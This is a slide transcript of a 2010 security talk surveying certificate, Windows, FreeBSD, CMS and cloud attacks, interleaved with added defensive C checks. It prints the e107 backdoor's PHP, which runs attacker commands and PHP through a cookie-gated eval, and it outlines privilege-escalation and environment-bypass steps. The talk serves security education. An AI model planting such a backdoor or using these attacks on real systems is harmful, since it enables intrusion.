Attacks and Defences


Presentation by Marco Slaviero at the University of Pretoria to the Tuks Linux User Group in 2010.

The aim of this presentation is to promote information security. The presentation begins with a look at a few recent attacks. Cloud computing is briefly discussed. The presentation ends with a discussion on Amazon web services and its security.


Attacks and Defences

  1. 1. Attacks and defences. Or, really cool hacks
     - [email_address]
  2. 2. About Us
     - company
     - +- 20 ppl
     - Pen-testing for a living
       - VMS
       - training
     - [email_address]
  3. 3. Why this talk?
     - Explain a little about recent attacks
     - Promote security
     - FLOSS angle? hmmm. FLOSS also insecure?
     - ZaCon (but only at the end, I promise)
  4. 4. x509 and MD5
  5. 7. x509 attack: MD5
     - Security of the system rests in the certificate signature
     - Security of the signature lies in the hashing algorithm
       - (Aside: hash function == one-way function that produces fixed-size output. MD5, SHA1, RIPE-MD etc.)
     - If two certificates hash to the same value, then their signatures will be the same
  6. 9. x509 attack: MD5
     - Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger
     - Figured out a way to create two colliding certificates
     - Then found CAs issuing certs with MD5, with predictable sequence numbers
  7. 10. x509 attack: MD5
     - Attack was:
       - Predict the sequence number by purchasing a cert, +1000
       - Predict validity times
       - Create two colliding certificates, one legit and the other evil. The legit cert assumes the fixed seq # and validity.
       - Submit a CSR for the legit cert
       - Hold thumbs on the timing/sequence number
       - Cut-n-paste the signature onto the evil cert
  8. 11. x509 attack: MD5
     - Collision attack performed on a cluster of 200 PS3s
     - Could perform 3 collisions in 72 hours
     - Cost them $600 in purchased certs
     - Earned a valid CA cert
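An added check, not from the talk, that does what a relying party should do with this result: refuse any certificate whose outer signatureAlgorithm is md5WithRSAEncryption. It walks the DER by hand (assuming the RFC 5280 Certificate layout, tbsCertificate first) and runs on a constructed stub certificate, not real CA data:

```c
#include <stddef.h>
#include <string.h>
/* Minimal DER TLV reader: sets tag/value/value-length for the element at buf
 * and returns its total encoded size, or 0 if malformed (lengths up to 2 bytes). */
static size_t der_read(const unsigned char *buf, size_t n, unsigned char *tag,
                       const unsigned char **val, size_t *vlen)
{
    size_t hdr = 2, len, i;
    if (n < 2) return 0;
    *tag = buf[0];
    if (buf[1] < 0x80) {
        len = buf[1];
    } else {
        size_t nb = buf[1] & 0x7f;
        if (nb == 0 || nb > 2 || n < 2 + nb) return 0;
        for (len = 0, i = 0; i < nb; i++) len = (len << 8) | buf[2 + i];
        hdr += nb;
    }
    if (len > n - hdr) return 0;
    *val = buf + hdr;
    *vlen = len;
    return hdr + len;
}
/* md5WithRSAEncryption = OID 1.2.840.113549.1.1.4, as DER content bytes. */
static const unsigned char OID_MD5_RSA[] =
    {0x2a,0x86,0x48,0x86,0xf7,0x0d,0x01,0x01,0x04};
/* Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signature }.
 * Returns 1 if the outer signatureAlgorithm is MD5-with-RSA, 0 if it is
 * anything else, -1 if the DER structure cannot be read. */
int cert_uses_md5(const unsigned char *der, size_t n)
{
    unsigned char tag;
    const unsigned char *body, *tbs, *alg, *oid;
    size_t blen, tlen, alen, olen, used;
    if (!der_read(der, n, &tag, &body, &blen) || tag != 0x30) return -1;
    used = der_read(body, blen, &tag, &tbs, &tlen);     /* skip tbsCertificate */
    if (!used || tag != 0x30) return -1;
    if (!der_read(body + used, blen - used, &tag, &alg, &alen) || tag != 0x30)
        return -1;                                       /* AlgorithmIdentifier */
    if (!der_read(alg, alen, &tag, &oid, &olen) || tag != 0x06) return -1;
    return olen == sizeof OID_MD5_RSA && memcmp(oid, OID_MD5_RSA, olen) == 0;
}
/* Constructed sample, not a real certificate: stub tbsCertificate holding one
 * INTEGER, AlgorithmIdentifier { md5WithRSAEncryption, NULL }, stub BIT STRING. */
static const unsigned char SAMPLE_MD5_CERT[] = {
    0x30,0x18, 0x30,0x03,0x02,0x01,0x01,
    0x30,0x0d, 0x06,0x09,0x2a,0x86,0x48,0x86,0xf7,0x0d,0x01,0x01,0x04, 0x05,0x00,
    0x03,0x02,0x00,0xff };
```

A full validator would also compare this OID against the tbsCertificate's own signature field, which must agree; the point here is that the algorithm is a policy decision the verifier makes, not something the CA's signature can vouch for.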
  9. 12. x509 and the CN
  10. 13. x509 attack: CN
     - Moxie Marlinspike loves SSL
     - He looked into how certs are issued and validated
     - CSRs use ASN.1 to serialise their data
       - Strings are prefixed with their length
     - Most libraries (and by extension browsers) use C functions to validate certs
       - Strings are terminated by NULs
  11. 14. x509 attack: CN
     - CN as evaluated in a CSR
     - CN as seen by a browser
  12. 15. x509 attack: CN
     - CAs verify the domain from the end
     - Browsers verify the domain from the front
  13. 16. x509 attack: CN
     - No explicit ban on disallowed characters in the CN
     - How about sending a NULL byte in a CSR?
     - The CA validates from the end, and if we're the owner of the domain after the NULL, then we get back a cert
     - When victims receive the malicious cert, their libs validate from the beginning, halting at the NULL
  14. 17. Validating the cert
     - Checks performed by the library:
       - Certificate is signed by a trusted CA
       - Validity is fine
       - CN appears to match the hostname
     - Great!
  15. 18. PKI attacks: cert checking
     - Who was vulnerable?
       - All NSS-based apps
         - Firefox
         - Thunderbird
         - ...
       - IE
       - A bunch of others (Pidgin, AIM, Outlook, Evolution, VPN clients, ...)
  16. 19. PKI attacks: cert checking
     - More attacks, including wildcard certs as well as remote buffer overflows
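Added example, not from the talk: the length-prefixed versus NUL-terminated comparison the CN slides describe, with the strcmp-based check beside a length-aware one that rejects the NUL outright. The hostnames and the CN bytes are constructed placeholders:

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* A CommonName as DER carries it: explicit length, so an embedded NUL byte
 * is just another byte of the value (this is what the CA sees). */
struct asn1_str { const unsigned char *p; size_t len; };

/* Vulnerable check, the behaviour the slides describe: the CN is handed to a
 * C string function, which stops at the first NUL and never sees the rest. */
int cn_matches_vuln(const struct asn1_str *cn, const char *host)
{
    return strcmp((const char *)cn->p, host) == 0;
}

/* Hardened check: walk the full DER length, reject any NUL or non-ASCII
 * byte (neither can occur in a hostname), then compare whole lengths. */
int cn_matches_fixed(const struct asn1_str *cn, const char *host)
{
    size_t i;
    for (i = 0; i < cn->len; i++)
        if (cn->p[i] == 0 || cn->p[i] >= 0x80) return 0;
    return cn->len == strlen(host) && memcmp(cn->p, host, cn->len) == 0;
}

/* Constructed sample CN: the victim's name, a NUL, then the domain the
 * requester actually controls (the part a CA checking from the end sees). */
static const unsigned char EVIL_CN[] = "bank.example\0requester.example";

int main(void)
{
    struct asn1_str cn = { EVIL_CN, sizeof EVIL_CN - 1 };  /* DER length: 30 */
    printf("strcmp-based check accepts forged CN: %d\n", cn_matches_vuln(&cn, "bank.example"));
    printf("length-aware check accepts forged CN: %d\n", cn_matches_fixed(&cn, "bank.example"));
    return 0;
}
```

The same length-aware rule belongs on the CA side: a CSR whose CN contains a NUL should be refused rather than signed.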
  17. 20. Win32 ring3 -> ring0
  18. 21. Win32: privilege escalation
     - Tavis Ormandy (Google) found a bug in how 'iret' was handled on NetBSD <-- he's a UNIX guy
     - Poked around on Win32
     - Found a related bug in the 8086 simulator on Win32
     - Great example of a long-standing bug (*)
     - Ridiculous exploit
     - Background...
  19. 22. Win32: 8086 simulator
     - Win32 supports execution of real-mode code
     - Simulated environment
     - The simulated app is run by a monitor, which performs the necessary sanity checks and provides fake interrupt handlers.
     - In real mode, apps get to change segment registers, which they can't in protected mode.
     - The monitor calls into the NT kernel when needed, on behalf of the simulated app.
  20. 23. Win32: exploit description
     - Spawn 'cmd.exe', grab a handle
     - Spawn 'debug.exe', which inits the NTVDM subsystem incl. the monitor
     - Inject a DLL into the monitor
     - DLL creates a fake kernel stack
     - Creates a new VDM context
     - Inserts a forged trap frame on the real stack that points to the fake kernel stack
     - Executes code that generates a #GP trap on 'iret'
     - Handler aborts early, forged frame restored. Control passes to attacker-supplied code.
     - Code searches for the SYSTEM token and assigns it to the initial 'cmd.exe'
     - Code cleans up completely and returns
     - cmd.exe is now 'SYSTEM'
  21. 24. Win32 demo
  22. 25. FreeBSD rtld
  23. 26. FreeBSD: rtld
     - dynamic linking
     - environment variables
       - LD_PRELOAD
       - ./myproggie
         - useful: substitute standard calls etc. etc.
         - will execute the library's _init() before main()
     - what about suid programs?
       - gotta remove dangerous environment variables like LD_PRELOAD
  24. 27. FreeBSD: rtld code

       if (suid) {
           ...
           unsetenv("LD_PRELOAD");
           unsetenv("LD_LIBMAP");
           ...
       }

       int __merge_environ() {
           ...
           if (strchr(*env, '=') == NULL) {
               return -1;
           ...

       int unsetenv(const char *name) {
           ...
           if (__merge_environ() == -1) {
               return -1;
           ...
           // unset env variable here

  25. 28. FreeBSD: rtld
     - So, executing with a corrupted env means the unsetenv()s will abort early, and the linker didn't check for this
     - One corrupted environment is:
       - { "moomoo", "" }
       - This skips the unsetting of env vars, but the loader will still load the lib
     - Now for the evilness...
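Added model of the bug class, not the FreeBSD source: an unsetenv() that fails on a corrupted environment (any entry without '=', such as the slide's "moomoo" or ""), called once with its result ignored, as the rtld code on the slide does, and once with the result checked. Function names are the model's own:

```c
#include <stddef.h>
#include <string.h>
/* Model of the libc logic quoted on the slides (not the FreeBSD source):
 * the merge step fails on any entry without '=', and unsetenv() then
 * returns -1 without removing anything. */
static int merge_environ(char **env)
{
    for (; *env; env++)
        if (strchr(*env, '=') == NULL)
            return -1;
    return 0;
}
/* Drop every "name=..." entry from env in place; -1 if env is corrupted. */
static int model_unsetenv(char **env, const char *name)
{
    size_t n = strlen(name), i, j;
    if (merge_environ(env) == -1)
        return -1;
    for (i = j = 0; env[i]; i++)
        if (!(strncmp(env[i], name, n) == 0 && env[i][n] == '='))
            env[j++] = env[i];
    env[j] = NULL;
    return 0;
}
/* 1 if an entry "name=..." is still present in env, 0 otherwise. */
int env_has(char **env, const char *name)
{
    size_t n = strlen(name);
    for (; *env; env++)
        if (strncmp(*env, name, n) == 0 && (*env)[n] == '=')
            return 1;
    return 0;
}
/* Vulnerable pattern, the rtld behaviour on the slides: the return value of
 * unsetenv() is ignored, so a corrupted env keeps LD_PRELOAD and the loader
 * still reports 1 ("go ahead and load"). */
int sanitize_suid_env_vuln(char **env)
{
    model_unsetenv(env, "LD_PRELOAD");
    model_unsetenv(env, "LD_LIBMAP");
    return 1;
}
/* Hardened pattern: a failed unsetenv() means the environment cannot be
 * trusted, so refuse to continue (0) instead of loading a set-uid program. */
int sanitize_suid_env_fixed(char **env)
{
    if (model_unsetenv(env, "LD_PRELOAD") == -1 ||
        model_unsetenv(env, "LD_LIBMAP") == -1)
        return 0;
    return 1;
}
```

Pass an environment array such as { "moomoo", "LD_PRELOAD=...", NULL } to both sanitizers to see the difference: the first leaves LD_PRELOAD in place and says load anyway, the second refuses.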
  26. 29. FreeBSD demo
  27. 30. e107 Backdoor
  28. 31. e107 Backdoor
     - Example of a real-world attack
     - Popular open source CMS
     - Large community / plugins / themes / blah blah
     - A blind SQL injection vuln reported in ver 0.7.15 (Nov 3, 2009)
     - On 25 Jan 2010, a mail appeared on FD
  29. 32. (image slide, no text)
  30. 33. e107: backdoor code

       if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb")
       {
           ...
           if(!empty($_POST['cmd']))
           {
               $out = execute($_POST['cmd']);
           }
           elseif(!empty($_POST['php'])){
               ob_start();
               eval($_POST['php']);
               $out = ob_get_contents();
               ob_end_clean();
           }
           ...
       }

  31. 34. e107 Backdoor
     - Turns out they were owned through the SQLi bug
     - Attackers replaced the download link with a link to the backdoored code
  32. 35. Let's talk cloud computing
     - (it's hot right now, isn't it?)
  33. 36. So, what exactly *is* the cloud?
  34. 39. What drives cloud adoption?
     - Management by in-flight magazine
       - Manager version
       - Geek version
     - Poor history from IT
     - Economy is down
       - Cost saving becomes more attractive
       - Cloud computing allows you to move from CAPEX to OPEX
       - (Private clouds?)
  35. 40. Problems with cloud testing
     - Transparency
     - Privacy
     - Compliance
     - Legal
     - Vendor lock-in
     - Availability
  36. 41. BlackHat talk summary
     - Attacked SugarSync, SalesForce, Amazon, MobileMe
     - Not enough time!!!
     - Amazon it is then...
  37. 42. Yes, it’s that cool...
  38. 43. Amazon EC2
     - Elastic Compute Cloud
     - Provides a Xen platform for running virtual machines
     - Easy (web interface)
     - Auto-scales
     - Cheap
     - Login, pick VM, boot, go!
  39. 44. Danger
     - Out of 2700 images, 47 are provided by Amazon
     - Are all secured equally?
     - Tested by scanning each VM with Nessus
       - 1293 Highs
       - 646 Criticals
     - Not good
     - Incompetence aside, what can we ascribe to malice?
  40. 45. Can we get someone to run our machine?
     - Bundle an image
     - Register the image (Amazon assigns it an AMI-ID)
     - Wait for someone to run it
     - Profit!
     - Alas... our AMI-ID is too low!
     - Solution:
       - do { /* register stuff */ } while (ami-id > threshold)
  41. 46. But there's more
     - Our race promoted our strangely named image (qscan)
     - Let's make it sexier
       - fedora - taken
       - fedora_core - taken
       - redhat - taken
       - fedora_core_11 - not taken!
  42. 49. What other cloud hacks?
     - SugarSync password reset
     - ClickJacking against SalesForce
     - Porting Nikto into SalesForce
     - License stealing from Amazon
     - Image stealing from Amazon users
     - Found bugs in MobileMe
     - In a position to read Steve Wozniak's mail :)
  43. 50. Linux bugs (it’s TLUG)
  44. 51. Linux
     - all kernel bugs are DoS
     - not really.
     - Tavis (remember him?) and Julien Tinnes found an exploitable bug in sendpage(), June 2009
     - >2.4.4 and all 2.6 kernels
     - existed since 2001
  45. 52. Linux demo
  46. 53. Questions? [email_address]
     - As promised:
     - ZaCon -> community sec conference
     - First edition in Nov '09
     - Papers / vids / list
     - details on the site
     - Attendees / speakers welcome
     - Great venue for 1st-time speakers
     - Look out for announcements.